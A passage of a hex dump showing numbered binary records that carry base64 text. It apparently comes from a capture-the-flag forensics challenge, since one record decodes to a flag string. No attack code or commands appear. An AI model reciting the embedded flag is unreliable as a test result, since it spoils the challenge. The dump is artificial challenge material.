34 72 72 43 58 4c 65 73 79 56 46 32 78 2b 4d 43 76 63 76 66 34 4f 48 69 4c 32 49 54 67 61 78 55 66 58 65 2f 36 4e 45 6e 39 62 4e 68 62 6f 47 45 32 75 45 62 4c 59 ....=.....tL.k4rrCXLesyVF2x+MCvcvf4OHiL2ITgaxUfXe/6NEn9bNhboGE2uEbLY 0000dc78: 15 14 13 12 3e 03 00 00 47 2f 51 06 00 41 32 6b 6d 42 36 66 59 7a 30 34 50 59 32 56 78 53 51 74 36 6e 42 6a 6e 6e 55 67 37 65 50 37 4a 66 35 6f 2f 6f 6b 76 51 68 68 6e 76 4d 54 41 4b 77 78 67 34 2f 42 62 ....>...G/Q..A2kmB6fYz04PY2VxSQt6nBjnnUg7eP7Jf5o/okvQhhnvMTAKwxg4/Bb 0000dcbc: 15 14 13 12 3f 03 00 00 a5 e4 ef 4e 00 51 39 55 2b 71 69 51 55 35 72 6a 45 4c 52 52 31 4d 4a 35 6a 44 34 79 4b 42 41 78 69 70 7a 31 75 4f 46 32 7a 56 74 48 52 41 7a 4c 37 70 38 47 55 64 76 36 45 42 44 5a ....?......N.Q9U+qiQU5rjELRR1MJ5jD4yKBAxipz1uOF2zVtHRAzL7p8GUdv6EBDZ 0000dd00: 15 14 13 12 40 03 00 00 bc 71 b3 07 00 37 53 7a 71 46 4c 58 51 4c 68 7a 57 61 51 37 57 6e 71 6c 34 46 49 52 45 42 58 6b 61 61 39 51 34 63 6f 57 57 39 57 38 7a 38 38 55 4c 4e 55 49 70 6c 51 55 2f 52 77 62 ....@....q...7SzqFLXQLhzWaQ7Wnql4FIREBXkaa9Q4coWW9W8z88ULNUIplQU/Rwb 0000dd44: 15 14 13 12 41 03 00 00 49 47 10 04 00 41 52 64 43 45 6a 58 4f 5a 6d 6e 4e 51 6a 65 39 64 65 4c 70 65 65 35 34 42 74 54 50 50 78 33 50 38 67 69 6c 44 54 59 6b 71 39 63 66 37 39 7a 6a 54 39 62 2f 49 6d 6c ....A...IG...ARdCEjXOZmnNQje9deLpee54BtTPPx3P8gilDTYkq9cf79zjT9b/Iml 0000dd88: 15 14 13 12 42 03 00 00 17 a3 5a 57 00 30 37 41 43 4c 46 78 53 4c 74 46 6c 38 36 4e 66 4d 6f 4a 57 4b 68 6c 73 74 51 4e 6d 56 6c 74 65 68 49 7a 39 4e 45 5a 58 52 47 61 35 76 30 66 58 6d 55 31 79 39 6b 46 ....B.....ZW.07ACLFxSLtFl86NfMoJWKhlstQNmVltehIz9NEZXRGa5v0fXmU1y9kF 0000ddcc: 15 14 13 12 43 03 00 00 8d 57 67 39 00 37 7a 79 52 78 30 52 65 4d 79 79 79 79 41 59 36 54 65 47 43 67 6f 2b 52 38 6c 6a 4e 63 74 52 49 46 7a 6a 70 63 49 47 6f 62 6d 30 31 74 6c 53 4b 6d 7a 56 2b 55 38 4e ....C....Wg9.7zyRx0ReMyyyyAY6TeGCgo+R8ljNctRIFzjpcIGobm01tlSKmzV+U8N 0000de10: 15 14 13 12 44 03 00 00 b7 68 6a 47 00 47 6b 43 50 77 78 59 54 4b 56 46 67 72 67 75 77 35 45 46 36 4a 48 4e 7a 58 67 68 50 77 55 37 7a 70 75 46 6b 44 41 6e 31 41 54 61 41 45 73 74 76 65 63 76 4a 4b 5a 68 ....D....hjG.GkCPwxYTKVFgrguw5EF6JHNzXghPwU7zpuFkDAn1ATaAEstvecvJKZh 0000de54: 15 14 13 12 45 03 00 00 19 26 d1 28 00 4e 31 57 4a 31 79 73 39 50 74 76 2f 64 52 2f 34 38 4b 2f 36 57 51 4d 73 46 46 72 77 6b 49 74 76 53 47 56 63 6a 37 39 54 47 4e 6e 65 50 79 66 5a 73 6b 56 4c 6c 76 43 ....E....&.(.N1WJ1ys9Ptv/dR/48K/6WQMsFFrwkItvSGVcj79TGNnePyfZskVLlvC 0000de98: 15 14 13 12 46 03 00 00 85 e9 be 55 00 6c 4d 6e 4c 6a 51 78 47 36 5a 2b 6e 47 50 42 39 62 75 47 30 41 48 2f 5a 79 75 54 61 64 70 66 36 52 52 4f 4a 78 4e 49 54 74 4f 74 39 61 6a 38 52 6b 4d 6f 34 7a 44 53 ....F......U.lMnLjQxG6Z+nGPB9buG0AH/ZyuTadpf6RROJxNITtOt9aj8RkMo4zDS 0000dedc: 15 14 13 12 47 03 00 00 e8 d0 41 2e 00 65 69 66 6a 51 4a 69 57 32 4b 33 73 64 74 4f 69 61 74 51 67 35 6d 56 52 65 77 4b 55 48 54 32 71 6a 2b 6d 71 33 72 76 35 75 66 63 55 78 30 4f 49 75 2b 46 70 30 57 5a ....G.....A..eifjQJiW2K3sdtOiatQg5mVRewKUHT2qj+mq3rv5ufcUx0OIu+Fp0WZ 0000df20: 15 14 13 12 48 03 00 00 58 2a a3 06 00 67 39 44 54 32 6a 32 4d 6f 37 37 4a 4e 2b 38 6a 6a 53 44 57 69 2b 77 72 6c 35 61 2b 48 42 63 55 70 6e 43 48 6f 4e 6e 7a 61 37 64 6b 41 77 70 33 45 44 66 39 33 43 78 ....H...X*...g9DT2j2Mo77JN+8jjSDWi+wrl5a+HBcUpnCHoNnza7dkAwp3EDf93Cx 0000df64: 15 14 13 12 49 03 00 00 da 79 54 02 00 47 59 64 2f 31 77 62 45 6d 66 2f 45 38 2f 75 34 64 4f 54 6c 48 49 67 6f 4b 53 62 2b 6e 34 6d 6c 35 4e 47 5a 6e 48 4b 71 42 48 61 5a 67 38 2b 6f 4b 75 66 2f 46 53 51 ....I....yT..GYd/1wbEmf/E8/u4dOTlHIgoKSb+n4ml5NGZnHKqBHaZg8+oKuf/FSQ 0000dfa8: 15 14 13 12 4a 03 00 00 d8 2c 11 35 00 68 39 64 41 53 57 62 78 44 32 37 4c 45 47 67 53 72 73 46 4e 46 6c 41 69 68 66 46 50 32 67 73 69 61 6f 5a 72 63 6f 71 71 32 30 7a 63 58 57 64 41 75 39 61 37 58 43 45 ....J....,.5.h9dASWbxD27LEGgSrsFNFlAihfFP2gsiaoZrcoqq20zcXWdAu9a7XCE 0000dfec: 15 14 13 12 4b 03 00 00 f4 70 da 20 00 65 2f 39 57 67 6f 34 36 55 4b 73 77 74 4a 70 62 6b 71 43 47 66 4a 67 6e 4a 73 31 79 30 54 59 73 36 66 59 74 6c 6f 50 6c 75 34 55 49 2b 66 79 62 63 71 35 64 78 30 69 ....K....p. .e/9Wgo46UKswtJpbkqCGfJgnJs1y0TYs6fYtloPlu4UI+fybcq5dx0i 0000e030: 15 14 13 12 4c 03 00 00 f4 2a f4 4c 00 62 6a 41 4c 62 62 61 68 6f 4e 69 49 54 35 74 37 41 37 6d 56 57 6c 67 5a 35 4e 31 65 62 62 55 4d 64 7a 43 67 76 49 36 51 4a 46 55 33 6d 58 46 4d 7a 68 64 74 31 41 2f ....L....*.L.bjALbbahoNiIT5t7A7mVWlgZ5N1ebbUMdzCgvI6QJFU3mXFMzhdt1A/ 0000e074: 15 14 13 12 4d 03 00 00 1b 91 f0 36 00 2f 63 44 64 70 55 2b 63 7a 4c 59 37 2f 6c 4f 36 55 62 59 44 7a 6e 45 41 35 6f 4b 56 30 64 47 6b 73 76 6c 41 39 63 6e 6b 2b 6f 66 77 51 41 6c 4a 54 76 42 6a 6b 43 76 ....M......6./cDdpU+czLY7/lO6UbYDznEA5oKV0dGksvlA9cnk+ofwQAlJTvBjkCv 0000e0b8: 15 14 13 12 4e 03 00 00 af 92 62 5c 00 46 79 74 33 71 4e 70 30 79 6d 39 6b 31 66 37 57 65 4f 46 68 36 44 4b 6d 6d 6d 50 4a 30 39 38 66 75 41 32 30 62 6b 2b 6f 57 68 33 68 2f 4e 51 35 48 52 30 50 35 66 41 ....N.....b\.Fyt3qNp0ym9k1f7WeOFh6DKmmmPJ098fuA20bk+oWh3h/NQ5HR0P5fA 0000e0fc: 15 14 13 12 4f 03 00 00 c1 8a 53 06 00 32 43 61 56 4a 6a 44 67 64 49 77 50 2f 51 48 4a 61 36 57 6e 61 75 52 34 30 46 6e 68 6c 31 6c 51 67 52 59 6e 52 34 32 79 6c 54 7a 63 43 58 6a 39 58 79 4e 78 46 4b 56 ....O.....S..2CaVJjDgdIwP/QHJa6WnauR40Fnhl1lQgRYnR42ylTzcCXj9XyNxFKV 0000e140: 15 14 13 12 50 03 00 00 2e 0a f7 01 00 6b 4a 54 69 49 64 76 75 49 51 4a 48 7a 42 48 67 77 32 50 54 33 49 7a 7a 71 31 6c 59 6f 44 47 67 50 2f 6e 54 42 35 4f 38 6e 62 33 51 47 2f 46 6d 51 72 33 67 31 67 47 ....P........kJTiIdvuIQJHzBHgw2PT3Izzq1lYoDGgP/nTB5O8nb3QG/FmQr3g1gG 0000e184: 15 14 13 12 51 03 00 00 86 25 30 35 00 31 75 2b 50 45 4e 51 70 61 79 61 52 49 46 32 6c 4e 71 49 49 4d 38 42 61 6b 51 4a 51 41 4e 77 66 35 45 65 45 68 73 35 79 4c 62 68 4b 73 73 61 65 61 62 76 53 6e 5a 38 ....Q....%05.1u+PENQpayaRIF2lNqIIM8BakQJQANwf5EeEhs5yLbhKssaeabvSnZ8 0000e1c8: 15 14 13 12 52 03 00 00 43 a3 2a 44 00 45 6c 4b 44 58 63 34 4e 2f 7a 34 33 35 53 7a 5a 35 74 66 46 2f 53 71 41 52 38 63 4e 48 75 6a 4b 5a 57 32 69 70 61 59 64 51 7a 36 69 6a 51 43 38 46 5a 32 78 7a 73 6e ....R...C.*D.ElKDXc4N/z435SzZ5tfF/SqAR8cNHujKZW2ipaYdQz6ijQC8FZ2xzsn 0000e20c: 15 14 13 12 53 03 00 00 a3 cf 9f 51 00 42 64 43 74 32 46 44 71 69 75 52 72 6a 42 36 6c 54 6d 32 6c 56 50 75 72 4b 7a 63 6f 37 4f 66 6a 31 6d 64 46 67 78 6e 2b 36 71 34 74 55 37 59 57 38 53 38 63 78 70 6e ....S......Q.BdCt2FDqiuRrjB6lTm2lVPurKzco7Ofj1mdFgxn+6q4tU7YW8S8cxpn 0000e250: 15 14 13 12 54 03 00 00 1c fa 0b 1d 00 7a 72 39 74 6d 74 4f 4c 30 6c 55 35 67 68 63 66 42 71 6c 69 79 38 7a 32 50 54 36 52 67 45 38 38 43 61 4d 45 76 48 5a 6c 78 32 79 58 77 2f 66 33 7a 37 35 53 54 31 72 ....T........zr9tmtOL0lU5ghcfBqliy8z2PT6RgE88CaMEvHZlx2yXw/f3z75ST1r 0000e294: 15 14 13 12 55 03 00 00 5f fc cb 2a 00 78 75 35 6c 69 35 52 46 2b 61 71 56 4a 35 49 45 2f 69 72 69 74 2b 6d 67 35 2b 71 66 39 74 46 66 57 75 39 35 48 43 73 76 4d 71 57 6c 51 68 50 64 4d 73 33 4d 38 61 76 ....U..._..*.xu5li5RF+aqVJ5IE/irit+mg5+qf9tFfWu95HCsvMqWlQhPdMs3M8av 0000e2d8: 15 14 13 12 56 03 00 00 a2 68 8d 26 00 35 37 56 76 43 52 62 31 50 4b 51 65 33 54 31 47 42 64 67 50 4c 48 65 41 6e 6e 48 62 62 70 7a 4d 72 61 49 37 78 58 46 74 70 32 68 75 4d 73 6a 43 35 4e 34 42 6c 5a 4b ....V....h.&.57VvCRb1PKQe3T1GBdgPLHeAnnHbbpzMraI7xXFtp2huMsjC5N4BlZK 0000e31c: 15 14 13 12 57 03 00 00 02 f2 e1 24 00 6c 53 4d 70 52 79 57 46 6c 5a 65 39 79 38 4c 74 6f 7a 6b 65 39 59 44 4f 62 39 34 71 39 62 58 36 6c 58 47 69 50 65 67 7a 64 58 57 56 79 35 34 6d 70 61 39 6e 78 68 77 ....W......$.lSMpRyWFlZe9y8Ltozke9YDOb94q9bX6lXGiPegzdXWVy54mpa9nxhw 0000e360: 15 14 13 12 58 03 00 00 e3 18 a1 1b 00 4c 35 68 35 65 56 39 71 6f 5a 7a 63 69 75 73 39 75 32 4e 30 6b 36 38 4a 42 72 57 48 5a 62 64 33 68 46 6f 48 61 37 43 31 39 43 37 7a 47 4f 63 55 46 44 42 35 5a 4d 56 ....X........L5h5eV9qoZzcius9u2N0k68JBrWHZbd3hFoHa7C19C7zGOcUFDB5ZMV 0000e3a4: 15 14 13 12 59 03 00 00 a5 cc 15 4a 00 5a 6d 7a 71 65 4a 58 45 44 44 39 63 63 78 4a 64 76 70 50 77 6e 56 34 5a 55 73 7a 32 4a 54 41 56 54 42 35 56 31 6a 56 5a 49 2f 69 6c 6f 45 4b 56 50 45 36 31 6e 71 75 ....Y......J.ZmzqeJXEDD9ccxJdvpPwnV4ZUsz2JTAVTB5V1jVZI/iloEKVPE61nqu 0000e3e8: 15 14 13 12 5a 03 00 00 ae 2b 50 15 00 2b 32 56 6a 4f 64 61 33 58 5a 31 6e 6f 6f 53 39 6e 72 67 67 72 50 6e 35 4d 50 6e 2b 43 32 32 6c 74 55 4f 67 76 50 33 77 6d 61 42 31 6f 4c 63 68 47 68 62 43 32 48 61 ....Z....+P..+2VjOda3XZ1nooS9nrggrPn5MPn+C22ltUOgvP3wmaB1oLchGhbC2Ha 0000e42c: 15 14 13 12 5b 03 00 00 00 e1 0b 5e 01 52 6b 78 42 52 31 39 43 55 6b 6c 4f 52 31 39 43 51 55 4e 4c 58 31 4e 4a 54 6b 46 55 55 6b 45 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ....[......^.RkxBR19CUklOR19CQUNLX1NJTkFUUkE=....................... 0000e470: 15 14 13 12 5c 03 00 00 c0 b4 2b 47 00 51 65 4e 4c 75 49 32 6d 41 51 72 53 68 2f 58 6b 50 76 4d 6a 6b 32 65 55 72 56 35 4d 36 6b 6a 55 4b 33 5a 4a 56 54 49 6d 43 7a 30 6f 73 70 51 4f 53 56 59 2b 54 43 6c ....\.....+G.QeNLuI2mAQrSh/XkPvMjk2eUrV5M6kjUK3ZJVTImCz0ospQOSVY+TCl 0000e4b4: 15 14 13 12 5d 03 00 00 33 ad ee 41 00 79 55 41 41 53 4d 51 75 4c 54 58 34 54 75 77 4b 74 50 30 47 34 57 6a 45 4c 4c 73 62 5a 2b 51 75 62 45 67 42 62 63 61 72 74 64 4e 4c 45 67 66 64 4f 76 4e 2b 36 56 55 ....]...3..A.yUAASMQuLTX4TuwKtP0G4WjELLsbZ+QubEgBbcartdNLEgfdOvN+6VU 0000e4f8: 15 14 13 12 5e 03 00 00 71 a4 59 2e 00 71 56 50 47 2f 48 59 50 63 2f 45 65 70 4e 78 34 52 31 78 45 77 30 61 46 52 62 6e 4e 38 6c 62 39 6c 65 4b 34 43 45 4a 4f 4d 53 6d 4c 6a 62 65 54 78 39 46 43 4f 4a 32 ....^...q.Y..qVPG/HYPc/EepNx4R1xEw0aFRbnN8lb9leK4CEJOMSmLjbeTx9FCOJ2 0000e53c: 15 14 13 12 5f 03 00 00 b5 1d c7 53 00 61 4b 69 76 36 53 38 4f 6f 67 4c 75 39 53 5a 4b 67 4b 4b 45 2f 47 4f 37 7a 78 69 36 53 64 39 57 4a 5a 49 4a 38 38 33 64 2b 63 33 5a 76 50 33 33 48 77 58 37 77 48 67 ...._......S.aKiv6S8OogLu9SZKgKKE/GO7zxi6Sd9WJZIJ883d+c3ZvP33HwX7wHg 0000e580: 15 14 13 12 60 03 00 00 16 3f 8b 29 00 49 65 55 47 67 58 35 50 72 66 6e 64 6c 61 35 38 79 56 38 4d 33 71 76 48 65 32 74 4e 69 6f 69 58 6e 45 48 39 42 78 6a 66 2b 52 36 59 72 58 41 73 61 63 45 41 36 37 32 ....`....?.).IeUGgX5Prfndla58yV8M3qvHe2tNioiXnEH9Bxjf+R6YrXAsacEA672 0000e5c4: 15 14 13 12 61 03 00 00 35 3c 77 1b 00 75 50 76 49 50 61 6e 4e 38 62 64 6d 52 4b 47 70 78 4c 6b 76 49 43 4e 4b 4d 74 4c 6a 33 63 6f 77 73 54 73 77 63 4a 2b 79 59 39 74 34 69 4c 62 38 4f 4a 74 4f 4c 63 5a ....a...5<w..uPvIPanN8bdmRKGpxLkvICNKMtLj3cowsTswcJ+yY9t4iLb8OJtOLcZ 0000e608: 15 14 13 12 62 03 00 00 b6 ee 0c 26 00 33 48 50 69 39 33 58 79 61 46 6c 7a 65 6f 6d 36 36 56 53 65 44 52 56 77 4e 6e 62 44 39 77 39 65 56 47 4c 42 75 34 56 62 76 6a 37 4d 32 4f 55 2b 36 4a 70 53 66 37 52 ....b......&.3HPi93XyaFlzeom66VSeDRVwNnbD9w9eVGLBu4Vbvj7M2OU+6JpSf7R 0000e64c: 15 14 13 12 63 03 00 00 ab 3e 11 52 00 64 64 44 67 41 65 4f 4c 6f 4f 7a 64 52 72 67 7a 38 7a 77 6d 4e 57 72 36 44 49 67 41 48 61 67 76 54 64 36 30 78 5a 7a 30 70 66 4f 47 54 48 76 56 79 36 35 73 78 47 69 ....c....>.R.ddDgAeOLoOzdRrgz8zwmNWr6DIgAHagvTd60xZz0pfOGTHvVy65sxGi 0000e690: 15 14 13 12 64 03 00 00 69 a7 58 3c 00 79 54 33 73 62 38 62 52 7a 33 50 57 41 4d 54 2b 62 50 36 30 69 39 43 65 30 7a 5a 4d 6f 57 58 55 7a 42 73 56 4f 37 42 76 68 4d 5a 2f 44 55 79 4e 6c 6f 73 33 6b 42 6c ....d...i.X<.yT3sb8bRz3PWAMT+bP60i9Ce0zZMoWXUzBsVO7BvhMZ/DUyNlos3kBl 0000e6d4: 15 14 13 12 65 03 00 00 16 4b d5 03 00 6b 6d 75 47 51 72 37 30 64 53 46 76 6f 67 72 48 72 43 43 4d 4c 72 41 6f 69 70 61 47 30 59 65 45 71 69 75 36 61 55 35 38 41 5a 52 7a 7a 72 5a 64 76 4d 54 6c 57 4d 45 ....e....K...kmuGQr70dSFvogrHrCCMLrAoipaG0YeEqiu6aU58AZRzzrZdvMTlWME 0000e718: 15 14 13 12 66 03 00 00 58 0e f9 0a 00 45 56 68 73 4a 54 38 5a 43 57 64 5a 46 52 45 68 54 36 30 36 6a 38 38 52 47 6a 62 4c 39 4d 41 50 7a 78 5a 55 75 76 57 50 67 7a 63 51 70 6b 6b 44 64 4e 47 6a 6a 32 67 ....f...X....EVhsJT8ZCWdZFREhT606j88RGjbL9MAPzxZUuvWPgzcQpkkDdNGjj2g 0000e75c: 15 14 13 12 67 03 00 00 f6 c5 e7 45 00 48 50 6e 54 51 63 66 42 79 5a 72 4d 35 2f 30 55 2f 45 39 78 46 69 5a 54 68 55 79 38 35 44 61 77 76 66 66 56 74 7a 47 48 68 33 37 70 73 2f 47 75 45 73 48 77 52 31 6a ....g......E.HPnTQcfByZrM5/0U/E9xFiZThUy85DawvffVtzGHh37ps/GuEsHwR1j 0000e7a0: 15 14 13 12 68 03 00 00 6e 83 99 2e 00 62 5a 56 69 6b 78 5a 6f 2f 42 61 52 32 52 78 79 54 45 7a 73 68 6e 2f 41 38 2f 78 55 4e 59 64 2f 44 75 76 57 64 4b 6f 2b 69 62 32 75 42 68 42 41 66 69 77 77 31 53 53 ....h...n....bZVikxZo/BaR2RxyTEzshn/A8/xUNYd/DuvWdKo+ib2uBhBAfiww1SS 0000e7e4: 15 14 13 12 69 03 00 00 b4 8f 4f 0e 00 73 65 30 52 5a 69 72 44 72 41 52 65 4e 68 77 4c 64 46 55 59 4c 38 4c 6c 6e 50 37 4f 4f 49 65 6d 41 65 65 5a 73 63 41 33 66 6b 46 49 72 48 52 2b 48 52 30 67 58 62 47 ....i.....O..se0RZirDrAReNhwLdFUYL8LlnP7OOIemAeeZscA3fkFIrHR+HR0gXbG 0000e828: 15 14 13 12 6a 03 00 00 6a 61 d7 12 00 4c 50 31 35 59 74 6c 63 4f 6b 68 4b 76 55 5a 74 78 36 6d 46 76 59 65 32 6a 46 38 67 67 64 52 49 39 71 37 51 51 67 51 49 4c 75 39 6e 6c 41 69 2b 32 58 74 6d 5a 68 64 ....j...ja...LP15YtlcOkhKvUZtx6mFvYe2jF8ggdRI9q7QQgQILu9nlAi+2XtmZhd 0000e86c: 15 14 13 12 6b 03 00 00 c2 cd e0 34 00 42 71 73 53 71 52 59 33 46 6e 4c 61 6b 36 64 44 6e 54 72 51 72 79 66 76 61 65 48 35 4a 6b 2b 39 4b 72 41 6b 4c 6c 56 65 47 71 58 78 67 73 59 2b 6b 6e 36 46 4a 45 75 ....k......4.BqsSqRY3FnLak6dDnTrQryfvaeH5Jk+9KrAkLlVeGqXxgsY+kn6FJEu 0000e8b0: 15 14 13 12 6c 03 00 00 20 1f 0d 37 00 73 7a 47 49 43 7a 2f 70 51 61 67 67 58 55 64 46 39 6b 36 5a 34 68 30 67 45 63 33 42 55 67 63 66 54 59 65 35 52 5a 77 50 53 34 5a 47 48 68 79 2b 66 71 55 44 52 64 36 ....l... ..7.szGICz/pQaggXUdF9k6Z4h0gEc3BUgcfTYe5RZwPS4ZGHhy+fqUDRd6 0000e8f4: 15 14 13 12 6d 03 00 00 15 f8 25 33 00 79 32 54 49 77 65 54 59 61 53 42 4e 78 36 73 64 55 36 78 33 71 46 43 7a 6d 71 64 6f 72 68 75 65 50 65 36 37 78 36 79 43 31 4e 6c 4d 48 65 74 2b 36 48 77 46 69 32 56 ....m.....%3.y2TIweTYaSBNx6sdU6x3qFCzmqdorhuePe67x6yC1NlMHet+6HwFi2V 0000e938: 15 14 13 12 6e 03 00 00 4e 60 98 0c 00 41 2f 74 30 51 74 4f 52 50 68 50 79 52 32 65 32 4e 66 52 59 36 67 6a 4b 6b 68 33 30 4f 61 2b 6e 66 32 69 53 6b 75 56 52 52 4c 31 33 69 36 6a 68 65 6d 2f 46 73 4b 45 ....n...N`...A/t0QtORPhPyR2e2NfRY6gjKkh30Oa+nf2iSkuVRRL13i6jhem/FsKE 0000e97c: 15 14 13 12 6f 03 00 00 89 fb 00 25 00 57 6e 74 4f 51 61 6a 6e 79 30 55 50 4e 76 5a 56 6f 38 52 68 4d 71 4c 7a 73 48 73 37 4a 30 49 32 75 4b 41 77 6b 30 68 44 45 47 34 34 53 57 4e 71 44 54 6d 42 2b 5a 66 ....o......%.WntOQajny0UPNvZVo8RhMqLzsHs7J0I2uKAwk0hDEG44SWNqDTmB+Zf 0000e9c0: 15 14 13 12 70 03 00 00 6b 1c e5 18 00 73 4a 71 4c 58 51 47 72 52 4e 41 74 78 43 4f 65 36 4f 70 63 6a 4b 39 46 48 61 4c 42 35 77 45 71 51 62 72 51 53 48 4b 38 44 49 43 68 74 43 73 62 34 74 4a 44 6a 71 42 ....p...k....sJqLXQGrRNAtxCOe6OpcjK9FHaLB5wEqQbrQSHK8DIChtCsb4tJDjqB 0000ea04: 15 14 13 12 71 03 00 00 09 5f 1c 33 00 32 65 68 42 75 46 36 66 30 44 6c 4a 5a 38 50 47 64 61 65 51 45 61 54 46 6d 69 4a 6e 33 78 68 4b 4c 49 62 54 36 4d 50 69 4e 75 69 71 71 55 74 53 48 46 74 54 35 70 6c ....q...._.3.2ehBuF6f0DlJZ8PGdaeQEaTFmiJn3xhKLIbT6MPiNuiqqUtSHFtT5pl 0000ea48: 15 14 13 12 72 03 00 00 23 26 35 50 00 52 4e 33 5a 48 58 67 2f 76 50 44 52 75 48 66 4b 6c 58 4b 45 4c 45 34 55 72 56 77 6b 77 6c 73 35 79 30 36 5a 4d 58 31 48 30 75 43 75 64 6b 6a 6e 74 35 70 7a 72 51 4e ....r...#&5P.RN3ZHXg/vPDRuHfKlXKELE4UrVwkwls5y06ZMX1H0uCudkjnt5pzrQN 0000ea8c: 15 14 13 12 73 03 00 00 5c ba db 13 00 75 63 4d 51 56 39 77 79 44 6b 6a 4a 4b 38 48 4f 66 61 56 34 5a 46 4f 4f 4d 39 61 72 44 62 65 38 52 79 32 49 4c 36 76 2f 53 2f 62 4a 61 54 30 77 50 39 47 72 71 2b 4e ....s...\....ucMQV9wyDkjJK8HOfaV4ZFOOM9arDbe8Ry2IL6v/S/bJaT0wP9Grq+N 0000ead0: 15 14 13 12 74 03 00 00 ee 70 44 2b 00 47 35 5a 55 38 6d 72 42 76 6e 30 76 45 7a 37 6f 2b 79 50 66 61 4d 54 75 32 67 6d 45 70 37 32 4e 32 58 62 61 48 31 6e 6d 4b 59 5a 36 45 64 53 44 6f 48 4e 63 46 65 58 ....t....pD+.G5ZU8mrBvn0vEz7o+yPfaMTu2gmEp72N2XbaH1nmKYZ6EdSDoHNcFeX 0000eb14: 15 14 13 12 75 03 00 00 c4 67 ad 57 00 75 30 46 74 63 68 61 4f 58 72 75 39 4c 59 47 6c 4e 72 4c 52 70 72 7a 5a 4d 4d 78 66 36 6e 4d 5a 6a 74 69 38 6e 4c 4f 4f 52 48 4c 45 58 50 48 72 66 53 41 54 36 55 59 ....u....g.W.u0FtchaOXru9LYGlNrLRprzZMMxf6nMZjti8nLOORHLEXPHrfSAT6UY 0000eb58: 15 14 13 12 76 03 00 00 29 31 f5 26 00 4f 42 66 42 72 48 54 53 2f 39 4c 50 54 57 55 46 58 34 5a 32 33 4b 38 75 64 4a 76 46 77 7a 59 38 58 42 4e 6c 6c 6a 48 6c 78 72 69 61 65 69 7a 71 32 59 6b 69 57 41 79 ....v...)1.&.OBfBrHTS/9LPTWUFX4Z23K8udJvFwzY8XBNlljHlxriaeizq2YkiWAy 0000eb9c: 15 14 13 12 77 03 00 00 f2 2d 44 5a 00 6d 42 52 49 6b 33 54 6a 6f 34 33 58 70 6b 58 76 74 38 50 6f 50 77 51 45 2b 56 2b 75 34 71 55 49 4d 70 46 65 63 53 6a 50 43 44 55 48 4d 36 32 75 49 4e 71 65 50 79 39 ....w....-DZ.mBRIk3Tjo43XpkXvt8PoPwQE+V+u4qUIMpFecSjPCDUHM62uINqePy9 0000ebe0: 15 14 13 12 78 03 00 00 2c 7b 2a 36 00 37 6b 4d 4b 67 36 53 70 57 69 76 38 64 66 59 72 75 45 6c 45 42 36 65 55 59 52 67 54 32 30 61 78 43 55 4f 4f 79 4c 68 68 38 46 78 71 30 44 74 55 67 76 63 79 57 6c 30 ....x...,{*6.7kMKg6SpWiv8dfYruElEB6eUYRgT20axCUOOyLhh8Fxq0DtUgvcyWl0 0000ec24: 15 14 13 12 79 03 00 00 8b 0c 23 47 00 6b 56 38 4e 6a 6c 75 33 57 6c 68 33 41 4f 31 69 41 32 68 7a 7a 6f 75 51 75 38 65 47 47 49 73 58 4a 62 46 55 38 78 53 4c 53 6f 75 35 6b 4f 75 6d 36 42 78 45 70 4a 32 ....y.....#G.kV8Njlu3Wlh3AO1iA2hzzouQu8eGGIsXJbFU8xSLSou5kOum6BxEpJ2 0000ec68: 15 14 13 12 7a 03 00 00 88 f6 0e 15 00 6d 32 2f 64 47 33 77 6b 2b 62 77 56 7a 46 2b 79 4f 55 38 44 77 37 45 4f 78 62 4e 64 68 4b 70 47 68 33 57 46 4c 42 50 57 42 6f 33 4f 36 41 70 34 48 71 32 69 4e 6c 52 ....z........m2/dG3wk+bwVzF+yOU8Dw7EOxbNdhKpGh3WFLBPWBo3O6Ap4Hq2iNlR 0000ecac: 15 14 13 12 7b 03 00 00 42 ec d9 51 00 65 41 4c 45 51 4f 63 2b 6b 6c 75 7a 38 4f 36 42 4e 2f 4f 34 57 43 65 6f 4f 6a 58 68 49 50 66 52 47 38 76 73 72 66 4e 61 59 4e 46 34 47 4a 4c 51 51 4a 56 47 4d 6d 72 ....{...B..Q.eALEQOc+kluz8O6BN/O4WCeoOjXhIPfRG8vsrfNaYNF4GJLQQJVGMmr 0000ecf0: 15 14 13 12 7c 03 00 00 8b 76 17 46 00 77 54 57 43 46 49 44 6e 4b 77 37 64 2b 78 5a 41 4c 69 2b 33 77 36 33 69 70 79 63 2f 30 78 44 59 70 36 77 2b 47 52 7a 6d 33 6d 6f 34 70 62 54 56 65 2b 58 38 7a 4b 37 ....|....v.F.wTWCFIDnKw7d+xZALi+3w63ipyc/0xDYp6w+GRzm3mo4pbTVe+X8zK7 0000ed34: 15 14 13 12 7d 03 00 00 88 e5 37 21 00 56 31 33 71 57 2b 46 71 49 4f 56 75 4d 70 31 31 76 65 4e 4a 52 62 38 51 4b 79 61 77 73 6c 4b 33 4c 50 65 31 4b 45 41 76 79 78 58 2f 59 71 46 5a 44 69 77 44 69 57 6b ....}.....7!.V13qW+FqIOVuMp11veNJRb8QKyawslK3LPe1KEAvyxX/YqFZDiwDiWk 0000ed78: 15 14 13 12 7e 03 00 00 5e 5a da 42 00 49 32 7a 31 4c 4b 54 32 30 2f 70 79 36 65 37 49 64 78 39 4e 65 54 4a 47 38 6e 37 44 53 36 6a 45 31 61 64 4f 2f 6d 79 6e 79 75 48 49 39 35 51 34 56 55 34 2f 4a 73 42 ....~...^Z.B.I2z1LKT20/py6e7Idx9NeTJG8n7DS6jE1adO/mynyuHI95Q4VU4/JsB 0000edbc: 15 14 13 12 7f 03 00 00 03 5f 89 51 00 76 33 2f 39 45 61 7a 30 50 32 4f 49 71 47 4b 79 6b 37 57 65 73 31 59 61 42 68 56 48 63 61 6f 6d 78 79 31 66 2f 52 30 54 63 46 36 4e 77 44 55 44 2b 70 70 59 55 62 56 ........._.Q.v3/9Eaz0P2OIqGKyk7Wes1YaBhVHcaomxy1f/R0TcF6NwDUD+ppYUbV 0000ee00: 15 14 13 12 80 03 00 00 ec 0c b3 11 00 66 50 39 5a 48 6e 7a 71 55 6b 33 47 32 68 48 61 39 6e 57 71 67 5a 67 66 33 2b 4d 52 6c 37 5a 6e 36 36 71 72 62 4e 37 75 51 54 42 6e 4a 66 56 31 45 41 38 79 7a 51 38 .............fP9ZHnzqUk3G2hHa9nWqgZgf3+MRl7Zn66qrbN7uQTBnJfV1EA8yzQ8 0000ee44: 15 14 13 12 81 03 00 00 f0 c1 b6 16 00 71 4d 5a 67 42 6e 4e 68 43 42 51 46 4a 52 51 6b 62 73 46 73 36 51 2b 55 